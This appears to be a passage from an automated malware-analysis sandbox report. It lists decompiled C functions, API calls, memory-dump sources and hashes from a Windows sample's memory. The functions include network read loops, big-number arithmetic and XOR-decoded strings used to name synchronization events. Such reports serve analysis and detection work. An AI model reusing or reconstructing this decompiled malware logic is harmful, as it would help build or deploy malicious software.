                                                          0x04636fa8
                                                          0x04636fae
                                                          0x04636fb4
                                                          0x04636fb8
                                                          0x04636fbe
                                                          0x04636fcb
                                                          0x04636fcf
                                                          0x04636fd5
                                                          0x04636fd8
                                                          0x04636fe0
                                                          0x04636fe1
                                                          0x04636fe5
                                                          0x04636fe9
                                                          0x04636fec
                                                          0x04636fef
                                                          0x04636ff5
                                                          0x04636ffe
                                                          0x04637004
                                                          0x04637005
                                                          0x04637008
                                                          0x04637009
                                                          0x0463700a
                                                          0x04637012
                                                          0x04637013
                                                          0x04637014
                                                          0x04637016
                                                          0x0463701a
                                                          0x0463701e
                                                          0x00000000
                                                          0x00000000
                                                          0x04637024
                                                          0x0463702d
                                                          0x04637033
                                                          0x0463703d
                                                          0x04637041
                                                          0x04637043
                                                          0x04637050
                                                          0x04637054
                                                          0x0463705c
                                                          0x04637061
                                                          0x04637073
                                                          0x04637075
                                                          0x0463707b
                                                          0x0463707b
                                                          0x04637084
                                                          0x04637084
                                                          0x04637086
                                                          0x0463708c
                                                          0x0463708c
                                                          0x0463708f
                                                          0x04637095
                                                          0x04637098
                                                          0x046370a1
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x046370a1
                                                          0x04636ff5
                                                          0x04636fef
                                                          0x04636fd8
                                                          0x046370a7
                                                          0x046370a7
                                                          0x046370ad
                                                          0x046370ad
                                                          0x046370b3
                                                          0x046370b3
                                                          0x046370bc
                                                          0x046370c2
                                                          0x046370c2
                                                          0x04636f7f
                                                          0x046370cb

                                                          APIs
                                                          • SysAllocString.OLEAUT32(0463C290), ref: 04636F8A
                                                          • lstrcmpW.KERNEL32(00000000,0076006F), ref: 0463706B
                                                          • SysFreeString.OLEAUT32(00000000), ref: 04637084
                                                          • SysFreeString.OLEAUT32(?), ref: 046370B3
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.273412911.0000000004631000.00000020.00000001.sdmp, Offset: 04630000, based on PE: true
                                                          • Associated: 00000009.00000002.273336452.0000000004630000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000009.00000002.273671396.000000000463C000.00000002.00000001.sdmp Download File
                                                          • Associated: 00000009.00000002.273780141.000000000463D000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000009.00000002.273884572.000000000463F000.00000002.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: String$Free$Alloclstrcmp
                                                          • String ID:
                                                          • API String ID: 1885612795-0
                                                          • Opcode ID: 590aaa8eeaa470f24c705e241844c3f009e64ca33e2e56fff12bec0618d59986
                                                          • Instruction ID: 58990ec4fc928ebf6db7db7366918659f27f878ab711b49057e93e3030b335f8
                                                          • Opcode Fuzzy Hash: 590aaa8eeaa470f24c705e241844c3f009e64ca33e2e56fff12bec0618d59986
                                                          • Instruction Fuzzy Hash: 565100B5D00559EFCB10DFE8C488DAEB7B5EF89706B148598E915EB310E732AD41CBA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0463391F, Relevance: 6.2, APIs: 4, Instructions: 154memoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • SysAllocString.OLEAUT32(?), ref: 0463395A
                                                          • SysFreeString.OLEAUT32(00000000), ref: 04633A3F
                                                            • Part of subcall function 04636F3A: SysAllocString.OLEAUT32(0463C290), ref: 04636F8A
                                                          • SafeArrayDestroy.OLEAUT32(00000000), ref: 04633A92
                                                          • SysFreeString.OLEAUT32(00000000), ref: 04633AA1
                                                            • Part of subcall function 04631AE2: Sleep.KERNEL32(000001F4), ref: 04631B2A
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.273412911.0000000004631000.00000020.00000001.sdmp, Offset: 04630000, based on PE: true
                                                          • Associated: 00000009.00000002.273336452.0000000004630000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000009.00000002.273671396.000000000463C000.00000002.00000001.sdmp Download File
                                                          • Associated: 00000009.00000002.273780141.000000000463D000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000009.00000002.273884572.000000000463F000.00000002.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: String$AllocFree$ArrayDestroySafeSleep
                                                          • String ID:
                                                          • API String ID: 3193056040-0
                                                          • Opcode ID: 4297a8b1e3e371862ff13c479a18a2e7c7b394611dc466768c338dc1964bbef0
                                                          • Instruction ID: 708dc3d4b1844fb6cbc7b12bb188c90c621f1d7e73aa020d7e3cc378640866d9
                                                          • Opcode Fuzzy Hash: 4297a8b1e3e371862ff13c479a18a2e7c7b394611dc466768c338dc1964bbef0
                                                          • Instruction Fuzzy Hash: C9514E76500689AFDB11CFE8C844A9EB7B6FF88746F148429E905EB320EB35ED45CB50
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 046353C6, Relevance: 6.1, APIs: 4, Instructions: 136COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 85%
                                                          			E046353C6(signed int __eax, void* __eflags, intOrPtr _a4, signed int _a8, signed int _a12, intOrPtr _a16) {
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				void _v92;
				void _v236;
				void* _t55;
				unsigned int _t56;
				signed int _t66;
				signed int _t74;
				void* _t76;
				signed int _t79;
				void* _t81;
				void* _t92;
				void* _t96;
				signed int* _t99;
				signed int _t101;
				signed int _t103;
				void* _t107;

				_t92 = _a12;
				_t101 = __eax;
				_t55 = E04631AD1(_a16, _t92);
				_t79 = _t55;
				if(_t79 == 0) {
					L18:
					return _t55;
				}
				_t56 =  *(_t92 + _t79 * 4 - 4);
				_t81 = 0;
				_t96 = 0x20;
				if(_t56 == 0) {
					L4:
					_t97 = _t96 - _t81;
					_v12 = _t96 - _t81;
					E046350FF(_t79,  &_v236);
					 *((intOrPtr*)(_t107 + _t101 * 4 - 0xe8)) = E04635745(_t101,  &_v236, _a8, _t96 - _t81);
					E04635745(_t79,  &_v92, _a12, _t97);
					_v8 =  *((intOrPtr*)(_t107 + _t79 * 4 - 0x5c));
					_t66 = E046350FF(_t101, 0x463d1b0);
					_t103 = _t101 - _t79;
					_a8 = _t103;
					if(_t103 < 0) {
						L17:
						E046350FF(_a16, _a4);
						E04635088(_t79,  &_v236, _a4, _t97);
						memset( &_v236, 0, 0x8c);
						_t55 = memset( &_v92, 0, 0x44);
						goto L18;
					}
					_t99 = _t107 + (_t103 + _t79) * 4 - 0xe8;
					do {
						if(_v8 != 0xffffffff) {
							_push(1);
							_push(0);
							_push(0);
							_push( *_t99);
							L0463AF2E();
							_t74 = _t66 +  *(_t99 - 4);
							asm("adc edx, esi");
							_push(0);
							_push(_v8 + 1);
							_push(_t92);
							_push(_t74);
							L0463AF28();
							if(_t92 > 0 || _t74 > 0xffffffff) {
								_t74 = _t74 | 0xffffffff;
								_v16 = _v16 & 0x00000000;
							}
						} else {
							_t74 =  *_t99;
						}
						_t106 = _t107 + _a8 * 4 - 0xe8;
						_a12 = _t74;
						_t76 = E04635F21(_t79,  &_v92, _t92, _t107 + _a8 * 4 - 0xe8, _t107 + _a8 * 4 - 0xe8, _t74);
						while(1) {
							 *_t99 =  *_t99 - _t76;
							if( *_t99 != 0) {
								goto L14;
							}
							L13:
							_t92 =  &_v92;
							if(E046390C2(_t79, _t92, _t106) < 0) {
								break;
							}
							L14:
							_a12 = _a12 + 1;
							_t76 = E04636044(_t79,  &_v92, _t106, _t106);
							 *_t99 =  *_t99 - _t76;
							if( *_t99 != 0) {
								goto L14;
							}
							goto L13;
						}
						_a8 = _a8 - 1;
						_t66 = _a12;
						_t99 = _t99 - 4;
						 *(0x463d1b0 + _a8 * 4) = _t66;
					} while (_a8 >= 0);
					_t97 = _v12;
					goto L17;
				}
				while(_t81 < _t96) {
					_t81 = _t81 + 1;
					_t56 = _t56 >> 1;
					if(_t56 != 0) {
						continue;
					}
					goto L4;
				}
				goto L4;
			}





















                                                          0x046353c9
                                                          0x046353d5
                                                          0x046353db
                                                          0x046353e0
                                                          0x046353e4
                                                          0x04635541
                                                          0x04635545
                                                          0x04635545
                                                          0x046353ea
                                                          0x046353ee
                                                          0x046353f2
                                                          0x046353f5
                                                          0x04635400
                                                          0x04635406
                                                          0x0463540b
                                                          0x0463540e
                                                          0x04635428
                                                          0x04635434
                                                          0x0463543d
                                                          0x04635447
                                                          0x0463544c
                                                          0x0463544e
                                                          0x04635451
                                                          0x046354ff
                                                          0x04635505
                                                          0x04635516
                                                          0x04635529
                                                          0x04635539
                                                          0x00000000
                                                          0x0463553e
                                                          0x0463545a
                                                          0x04635461
                                                          0x04635465
                                                          0x0463546b
                                                          0x0463546d
                                                          0x0463546f
                                                          0x04635471
                                                          0x04635473
                                                          0x0463547d
                                                          0x04635482
                                                          0x04635484
                                                          0x04635486
                                                          0x04635487
                                                          0x04635488
                                                          0x04635489
                                                          0x04635490
                                                          0x04635497
                                                          0x0463549a
                                                          0x0463549a
                                                          0x04635467
                                                          0x04635467
                                                          0x04635467
                                                          0x046354a2
                                                          0x046354aa
                                                          0x046354b3
                                                          0x046354b8
                                                          0x046354b8
                                                          0x046354bd
                                                          0x00000000
                                                          0x00000000
                                                          0x046354bf
                                                          0x046354c2
                                                          0x046354cc
                                                          0x00000000
                                                          0x00000000
                                                          0x046354ce
                                                          0x046354ce
                                                          0x046354d8
                                                          0x046354b8
                                                          0x046354bd
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x046354bd
                                                          0x046354e2
                                                          0x046354e5
                                                          0x046354e8
                                                          0x046354ef
                                                          0x046354ef
                                                          0x046354fc
                                                          0x00000000
                                                          0x046354fc
                                                          0x046353f7
                                                          0x046353fb
                                                          0x046353fc
                                                          0x046353fe
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x046353fe
                                                          0x00000000

                                                          APIs
                                                          • _allmul.NTDLL(?,00000000,00000000,00000001), ref: 04635473
                                                          • _aulldiv.NTDLL(00000000,?,00000100,00000000), ref: 04635489
                                                          • memset.NTDLL ref: 04635529
                                                          • memset.NTDLL ref: 04635539
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.273412911.0000000004631000.00000020.00000001.sdmp, Offset: 04630000, based on PE: true
                                                          • Associated: 00000009.00000002.273336452.0000000004630000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000009.00000002.273671396.000000000463C000.00000002.00000001.sdmp Download File
                                                          • Associated: 00000009.00000002.273780141.000000000463D000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000009.00000002.273884572.000000000463F000.00000002.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: memset$_allmul_aulldiv
                                                          • String ID:
                                                          • API String ID: 3041852380-0
                                                          • Opcode ID: c7bd12976faab34d39488f89918d215e899863cc72ee007c8d6752664afc9289
                                                          • Instruction ID: 1f77c7215bb237bda266249a67f996f84fa6e4e664476a7463449ce61bb434d7
                                                          • Opcode Fuzzy Hash: c7bd12976faab34d39488f89918d215e899863cc72ee007c8d6752664afc9289
                                                          • Instruction Fuzzy Hash: EC418271A00299BBEB149FA8CC40BDE7775EF44316F108529F91BA7280FB70BD558B94
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0463A81C, Relevance: 6.1, APIs: 4, Instructions: 126stringCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • lstrlen.KERNEL32(?,00000008,74B04D40), ref: 0463A82E
                                                            • Part of subcall function 0463A71F: RtlAllocateHeap.NTDLL(00000000,00000000,04635595), ref: 0463A72B
                                                          • ResetEvent.KERNEL32(?), ref: 0463A8A2
                                                          • GetLastError.KERNEL32 ref: 0463A8C5
                                                          • GetLastError.KERNEL32 ref: 0463A970
                                                            • Part of subcall function 0463A734: HeapFree.KERNEL32(00000000,00000000,04635637,00000000,?,?,00000000), ref: 0463A740
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.273412911.0000000004631000.00000020.00000001.sdmp, Offset: 04630000, based on PE: true
                                                          • Associated: 00000009.00000002.273336452.0000000004630000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000009.00000002.273671396.000000000463C000.00000002.00000001.sdmp Download File
                                                          • Associated: 00000009.00000002.273780141.000000000463D000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000009.00000002.273884572.000000000463F000.00000002.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: ErrorHeapLast$AllocateEventFreeResetlstrlen
                                                          • String ID:
                                                          • API String ID: 943265810-0
                                                          • Opcode ID: 8cd09a093aebb4d71e17043477985e50c4e876dde8096352dc24f77482af8f5f
                                                          • Instruction ID: 4988cfe0586e61eeb28c7e6fe0615ce777bc050b6efd9583b928845b6005b3ce
                                                          • Opcode Fuzzy Hash: 8cd09a093aebb4d71e17043477985e50c4e876dde8096352dc24f77482af8f5f
                                                          • Instruction Fuzzy Hash: 27418E71500284BFD7219FE1CC88E5B7BBDEB9570AF114929F582E2190F732E945EB20
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 046315FF, Relevance: 6.1, APIs: 4, Instructions: 124COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 42%
                                                          			E046315FF(void* __eax, void* __ecx) {
				char _v8;
				void* _v12;
				intOrPtr _v16;
				char _v20;
				void* __esi;
				void* _t30;
				intOrPtr _t38;
				intOrPtr* _t39;
				intOrPtr* _t41;
				void* _t54;
				long _t64;
				void* _t67;
				void* _t69;

				_t58 = __ecx;
				_t67 = __eax;
				if( *((intOrPtr*)(__eax + 0xc)) != 0) {
					L2:
					_t30 = _t67;
					_pop(_t68);
					_t69 = _t30;
					_t64 = 0;
					ResetEvent( *(_t69 + 0x1c));
					_push( &_v8);
					_push(4);
					_push( &_v20);
					_push( *((intOrPtr*)(_t69 + 0x18)));
					if( *0x463d134() != 0) {
						L9:
						if(_v8 == 0) {
							 *((intOrPtr*)(_t69 + 0x30)) = 0;
						} else {
							 *0x463d164(0, 1,  &_v12);
							if(0 != 0) {
								_t64 = 8;
							} else {
								_t38 = E0463A71F(0x1000);
								_v16 = _t38;
								if(_t38 == 0) {
									_t64 = 8;
								} else {
									_push(0);
									_push(_v8);
									_push( &_v20);
									while(1) {
										_t41 = _v12;
										_t61 =  *_t41;
										 *((intOrPtr*)( *_t41 + 0x10))(_t41);
										ResetEvent( *(_t69 + 0x1c));
										_push( &_v8);
										_push(0x1000);
										_push(_v16);
										_push( *((intOrPtr*)(_t69 + 0x18)));
										if( *0x463d134() != 0) {
											goto L17;
										}
										_t64 = GetLastError();
										if(_t64 == 0x3e5) {
											_t64 = E04635646( *(_t69 + 0x1c), _t61, 0xffffffff);
											if(_t64 == 0) {
												_t64 =  *((intOrPtr*)(_t69 + 0x28));
												if(_t64 == 0) {
													goto L17;
												}
											}
										}
										L19:
										E0463A734(_v16);
										if(_t64 == 0) {
											_t64 = E046370CC(_v12, _t69);
										}
										goto L22;
										L17:
										_t64 = 0;
										if(_v8 != 0) {
											_push(0);
											_push(_v8);
											_push(_v16);
											continue;
										}
										goto L19;
									}
								}
								L22:
								_t39 = _v12;
								 *((intOrPtr*)( *_t39 + 8))(_t39);
							}
						}
					} else {
						_t64 = GetLastError();
						if(_t64 != 0x3e5) {
							L8:
							if(_t64 == 0) {
								goto L9;
							}
						} else {
							_t64 = E04635646( *(_t69 + 0x1c), _t58, 0xffffffff);
							if(_t64 == 0) {
								_t64 =  *((intOrPtr*)(_t69 + 0x28));
								goto L8;
							}
						}
					}
					return _t64;
				} else {
					_t54 = E04639242(__ecx, __eax);
					if(_t54 != 0) {
						return _t54;
					} else {
						goto L2;
					}
				}
			}
















                                                          0x046315ff
                                                          0x04631600
                                                          0x04631606
                                                          0x04631611
                                                          0x04631611
                                                          0x04631613
                                                          0x046318e7
                                                          0x046318ec
                                                          0x046318ee
                                                          0x046318f3
                                                          0x046318f4
                                                          0x046318f9
                                                          0x046318fa
                                                          0x04631905
                                                          0x04631936
                                                          0x0463193b
                                                          0x046319fe
                                                          0x04631941
                                                          0x04631948
                                                          0x04631950
                                                          0x046319fb
                                                          0x04631956
                                                          0x0463195b
                                                          0x04631960
                                                          0x04631965
                                                          0x046319ed
                                                          0x0463196b
                                                          0x0463196b
                                                          0x0463196d
                                                          0x04631973
                                                          0x04631974
                                                          0x04631974
                                                          0x04631977
                                                          0x0463197a
                                                          0x04631980
                                                          0x04631985
                                                          0x04631986
                                                          0x0463198b
                                                          0x0463198e
                                                          0x04631999
                                                          0x00000000
                                                          0x00000000
                                                          0x046319a1
                                                          0x046319a9
                                                          0x046319b5
                                                          0x046319b9
                                                          0x046319bb
                                                          0x046319c0
                                                          0x00000000
                                                          0x00000000
                                                          0x046319c0
                                                          0x046319b9
                                                          0x046319d2
                                                          0x046319d5
                                                          0x046319dc
                                                          0x046319e7
                                                          0x046319e7
                                                          0x00000000
                                                          0x046319c2
                                                          0x046319c2
                                                          0x046319c7
                                                          0x046319c9
                                                          0x046319ca
                                                          0x046319cd
                                                          0x00000000
                                                          0x046319cd
                                                          0x00000000
                                                          0x046319c7
                                                          0x04631974
                                                          0x046319ee
                                                          0x046319ee
                                                          0x046319f4
                                                          0x046319f4
                                                          0x04631950
                                                          0x04631907
                                                          0x0463190d
                                                          0x04631915
                                                          0x0463192e
                                                          0x04631930
                                                          0x00000000
                                                          0x00000000
                                                          0x04631917
                                                          0x04631921
                                                          0x04631925
                                                          0x0463192b
                                                          0x00000000
                                                          0x0463192b
                                                          0x04631925
                                                          0x04631915
                                                          0x04631a07
                                                          0x04631608
                                                          0x04631608
                                                          0x0463160f
                                                          0x0463161a
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x0463160f

                                                          APIs
                                                          • ResetEvent.KERNEL32(?,00000000,?,00000102,?,?,00000000,00000000,74B481D0), ref: 046318EE
                                                          • GetLastError.KERNEL32(?,?,?,00000000,74B481D0), ref: 04631907
                                                          • ResetEvent.KERNEL32(?), ref: 04631980
                                                          • GetLastError.KERNEL32 ref: 0463199B
                                                            • Part of subcall function 04639242: WaitForSingleObject.KERNEL32(?,00000000,00000000,00000102,?,00000000,00000000,74B481D0), ref: 04639259
                                                            • Part of subcall function 04639242: SetEvent.KERNEL32(?), ref: 04639269
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.273412911.0000000004631000.00000020.00000001.sdmp, Offset: 04630000, based on PE: true
                                                          • Associated: 00000009.00000002.273336452.0000000004630000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000009.00000002.273671396.000000000463C000.00000002.00000001.sdmp Download File
                                                          • Associated: 00000009.00000002.273780141.000000000463D000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000009.00000002.273884572.000000000463F000.00000002.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: Event$ErrorLastReset$ObjectSingleWait
                                                          • String ID:
                                                          • API String ID: 1123145548-0
                                                          • Opcode ID: 27403b2cd4eb2aec9a547f5051ca7b6c5dd8f06f3ae6f191dc9559e52dc6f2ab
                                                          • Instruction ID: e18d004ae149eeb32ec5809308d6035962161339d30d2837e8b6c0f64ba348fe
                                                          • Opcode Fuzzy Hash: 27403b2cd4eb2aec9a547f5051ca7b6c5dd8f06f3ae6f191dc9559e52dc6f2ab
                                                          • Instruction Fuzzy Hash: 5241A032600684ABDB219FA5CC44AEEB7B9EF8936BF100529E552D7290FB30FD419B50
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 04633AB0, Relevance: 6.1, APIs: 4, Instructions: 104memoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • SysAllocString.OLEAUT32(80000002), ref: 04633B0D
                                                          • SysAllocString.OLEAUT32(046385ED), ref: 04633B51
                                                          • SysFreeString.OLEAUT32(00000000), ref: 04633B65
                                                          • SysFreeString.OLEAUT32(00000000), ref: 04633B73
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.273412911.0000000004631000.00000020.00000001.sdmp, Offset: 04630000, based on PE: true
                                                          • Associated: 00000009.00000002.273336452.0000000004630000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000009.00000002.273671396.000000000463C000.00000002.00000001.sdmp Download File
                                                          • Associated: 00000009.00000002.273780141.000000000463D000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000009.00000002.273884572.000000000463F000.00000002.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: String$AllocFree
                                                          • String ID:
                                                          • API String ID: 344208780-0
                                                          • Opcode ID: 8c17912eb00aef32b8d02ef206d436e8c024b1fcdb4ce903fd7d2d55f8b9aa31
                                                          • Instruction ID: 047e8dd7af94f4bd351c246fe6611f83ea459d4ac47194e82364de6b2587d2b2
                                                          • Opcode Fuzzy Hash: 8c17912eb00aef32b8d02ef206d436e8c024b1fcdb4ce903fd7d2d55f8b9aa31
                                                          • Instruction Fuzzy Hash: 81311272900289EFCB04DF98D8C49AE7BB9FF58301B10845EF90697351E735A981CF65
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 046311EE, Relevance: 6.1, APIs: 4, Instructions: 96synchronizationCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 87%
                                                          			E046311EE(signed int _a4, signed int* _a8) {
				void* __ecx;
				void* __edi;
				signed int _t6;
				intOrPtr _t8;
				intOrPtr _t12;
				short* _t19;
				void* _t25;
				signed int* _t28;
				CHAR* _t30;
				long _t31;
				intOrPtr* _t32;

				_t6 =  *0x463d270; // 0xd448b889
				_t32 = _a4;
				_a4 = _t6 ^ 0x109a6410;
				_t8 =  *0x463d2a8; // 0x88a5a8
				_t3 = _t8 + 0x463e87e; // 0x61636f4c
				_t25 = 0;
				_t30 = E046338A8(_t3, 1);
				if(_t30 != 0) {
					_t25 = CreateEventA(0x463d2ac, 1, 0, _t30);
					E0463A734(_t30);
				}
				_t12 =  *0x463d25c; // 0x4000000a
				if(_t12 <= 5 || _t12 == 6 && _t12 >= 2 ||  *_t32 == 0 || E0463A65C() != 0) {
					L12:
					_t28 = _a8;
					if(_t28 != 0) {
						 *_t28 =  *_t28 | 0x00000001;
					}
					_t31 = E04638EA1(_t32, 0);
					if(_t31 == 0 && _t25 != 0) {
						_t31 = WaitForSingleObject(_t25, 0x4e20);
					}
					if(_t28 != 0 && _t31 != 0) {
						 *_t28 =  *_t28 & 0xfffffffe;
					}
					goto L20;
				} else {
					_t19 =  *0x463d10c( *_t32, 0x20);
					if(_t19 != 0) {
						 *_t19 = 0;
						_t19 = _t19 + 2;
					}
					_t31 = E0463A273(0,  *_t32, _t19, 0);
					if(_t31 == 0) {
						if(_t25 == 0) {
							L22:
							return _t31;
						}
						_t31 = WaitForSingleObject(_t25, 0x4e20);
						if(_t31 == 0) {
							L20:
							if(_t25 != 0) {
								CloseHandle(_t25);
							}
							goto L22;
						}
					}
					goto L12;
				}
			}














                                                          0x046311ef
                                                          0x046311f6
                                                          0x04631200
                                                          0x04631204
                                                          0x0463120a
                                                          0x04631219
                                                          0x04631220
                                                          0x04631224
                                                          0x04631236
                                                          0x04631238
                                                          0x04631238
                                                          0x0463123d
                                                          0x04631244
                                                          0x0463129b
                                                          0x0463129b
                                                          0x046312a1
                                                          0x046312a3
                                                          0x046312a3
                                                          0x046312ad
                                                          0x046312b1
                                                          0x046312c3
                                                          0x046312c3
                                                          0x046312c7
                                                          0x046312cd
                                                          0x046312cd
                                                          0x00000000
                                                          0x0463125d
                                                          0x04631262
                                                          0x0463126a
                                                          0x0463126e
                                                          0x04631272
                                                          0x04631272
                                                          0x0463127f
                                                          0x04631283
                                                          0x04631287
                                                          0x046312dc
                                                          0x046312e2
                                                          0x046312e2
                                                          0x04631295
                                                          0x04631299
                                                          0x046312d0
                                                          0x046312d2
                                                          0x046312d5
                                                          0x046312d5
                                                          0x00000000
                                                          0x046312d2
                                                          0x04631299
                                                          0x00000000
                                                          0x04631283

                                                          APIs
                                                            • Part of subcall function 046338A8: lstrlen.KERNEL32(00000005,00000000,63699BC3,00000027,00000000,04EC9A98,00000000,?,?,63699BC3,00000005,0463D00C,?,?,04635D30), ref: 046338DE
                                                            • Part of subcall function 046338A8: lstrcpy.KERNEL32(00000000,00000000), ref: 04633902
                                                            • Part of subcall function 046338A8: lstrcat.KERNEL32(00000000,00000000), ref: 0463390A
                                                          • CreateEventA.KERNEL32(0463D2AC,00000001,00000000,00000000,61636F4C,00000001,00000000,00000001,?,00000000,?,04633760,?,00000001,?), ref: 0463122F
                                                            • Part of subcall function 0463A734: HeapFree.KERNEL32(00000000,00000000,04635637,00000000,?,?,00000000), ref: 0463A740
                                                          • WaitForSingleObject.KERNEL32(00000000,00004E20,04633760,00000000,00000000,?,00000000,?,04633760,?,00000001,?,?,?,?,046352AA), ref: 0463128F
                                                          • WaitForSingleObject.KERNEL32(00000000,00004E20,61636F4C,00000001,00000000,00000001,?,00000000,?,04633760,?,00000001,?), ref: 046312BD
                                                          • CloseHandle.KERNEL32(00000000,61636F4C,00000001,00000000,00000001,?,00000000,?,04633760,?,00000001,?,?,?,?,046352AA), ref: 046312D5
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.273412911.0000000004631000.00000020.00000001.sdmp, Offset: 04630000, based on PE: true
                                                          • Associated: 00000009.00000002.273336452.0000000004630000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000009.00000002.273671396.000000000463C000.00000002.00000001.sdmp Download File
                                                          • Associated: 00000009.00000002.273780141.000000000463D000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000009.00000002.273884572.000000000463F000.00000002.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: ObjectSingleWait$CloseCreateEventFreeHandleHeaplstrcatlstrcpylstrlen
                                                          • String ID:
                                                          • API String ID: 73268831-0
                                                          • Opcode ID: 0904778d2a7e9b7b29458cda2a22fb13eb776b0089dd1e2a38acbe15e34498ce
                                                          • Instruction ID: 1054c62e7dd5baba2521e5ebad6de8b867c1f9b67fd1b4daf41b7f4f2d8f848c
                                                          • Opcode Fuzzy Hash: 0904778d2a7e9b7b29458cda2a22fb13eb776b0089dd1e2a38acbe15e34498ce
                                                          • Instruction Fuzzy Hash: EF21E432A003D05BD721DAA88C44EEB73A9FFAA713F050619FA55E7240FB75EC818694
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 04639242, Relevance: 6.1, APIs: 4, Instructions: 92synchronizationCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 38%
                                                          			E04639242(void* __ecx, void* __esi) {
				char _v8;
				long _v12;
				char _v16;
				long _v20;
				long _t34;
				long _t39;
				long _t42;
				long _t56;
				intOrPtr _t58;
				void* _t59;
				intOrPtr* _t60;
				void* _t61;

				_t61 = __esi;
				_t59 = __ecx;
				_t60 =  *0x463d13c; // 0x463abf1
				 *((intOrPtr*)(__esi + 0x2c)) = 0;
				do {
					_t34 = WaitForSingleObject( *(_t61 + 0x1c), 0);
					_v20 = _t34;
					if(_t34 != 0) {
						L3:
						_push( &_v16);
						_push( &_v8);
						_push(_t61 + 0x2c);
						_push(0x20000013);
						_push( *((intOrPtr*)(_t61 + 0x18)));
						_v8 = 4;
						_v16 = 0;
						if( *_t60() == 0) {
							_t39 = GetLastError();
							_v12 = _t39;
							if(_v20 == 0 || _t39 != 0x2ef3) {
								L15:
								return _v12;
							} else {
								goto L11;
							}
						}
						if(_v8 != 4 ||  *((intOrPtr*)(_t61 + 0x2c)) == 0) {
							goto L11;
						} else {
							_v16 = 0;
							_v8 = 0;
							 *_t60( *((intOrPtr*)(_t61 + 0x18)), 0x16, 0,  &_v8,  &_v16);
							_t58 = E0463A71F(_v8 + 1);
							if(_t58 == 0) {
								_v12 = 8;
							} else {
								_push( &_v16);
								_push( &_v8);
								_push(_t58);
								_push(0x16);
								_push( *((intOrPtr*)(_t61 + 0x18)));
								if( *_t60() == 0) {
									E0463A734(_t58);
									_v12 = GetLastError();
								} else {
									 *((char*)(_t58 + _v8)) = 0;
									 *((intOrPtr*)(_t61 + 0xc)) = _t58;
								}
							}
							goto L15;
						}
					}
					SetEvent( *(_t61 + 0x1c));
					_t56 =  *((intOrPtr*)(_t61 + 0x28));
					_v12 = _t56;
					if(_t56 != 0) {
						goto L15;
					}
					goto L3;
					L11:
					_t42 = E04635646( *(_t61 + 0x1c), _t59, 0xea60);
					_v12 = _t42;
				} while (_t42 == 0);
				goto L15;
			}















                                                          0x04639242
                                                          0x04639242
                                                          0x0463924c
                                                          0x04639252
                                                          0x04639255
                                                          0x04639259
                                                          0x0463925f
                                                          0x04639264
                                                          0x0463927d
                                                          0x04639280
                                                          0x04639284
                                                          0x04639288
                                                          0x04639289
                                                          0x0463928e
                                                          0x04639291
                                                          0x04639298
                                                          0x0463929f
                                                          0x046392f2
                                                          0x046392f8
                                                          0x046392fe
                                                          0x04639339
                                                          0x0463933f
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x046392fe
                                                          0x046392a5
                                                          0x00000000
                                                          0x046392ac
                                                          0x046392ba
                                                          0x046392bd
                                                          0x046392c0
                                                          0x046392cc
                                                          0x046392d0
                                                          0x04639332
                                                          0x046392d2
                                                          0x046392d5
                                                          0x046392d9
                                                          0x046392da
                                                          0x046392db
                                                          0x046392dd
                                                          0x046392e4
                                                          0x04639322
                                                          0x0463932d
                                                          0x046392e6
                                                          0x046392e9
                                                          0x046392ed
                                                          0x046392ed
                                                          0x046392e4
                                                          0x00000000
                                                          0x046392d0
                                                          0x046392a5
                                                          0x04639269
                                                          0x0463926f
                                                          0x04639272
                                                          0x04639277
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x04639307
                                                          0x0463930f
                                                          0x04639314
                                                          0x04639317
                                                          0x00000000

                                                          APIs
                                                          • WaitForSingleObject.KERNEL32(?,00000000,00000000,00000102,?,00000000,00000000,74B481D0), ref: 04639259
                                                          • SetEvent.KERNEL32(?), ref: 04639269
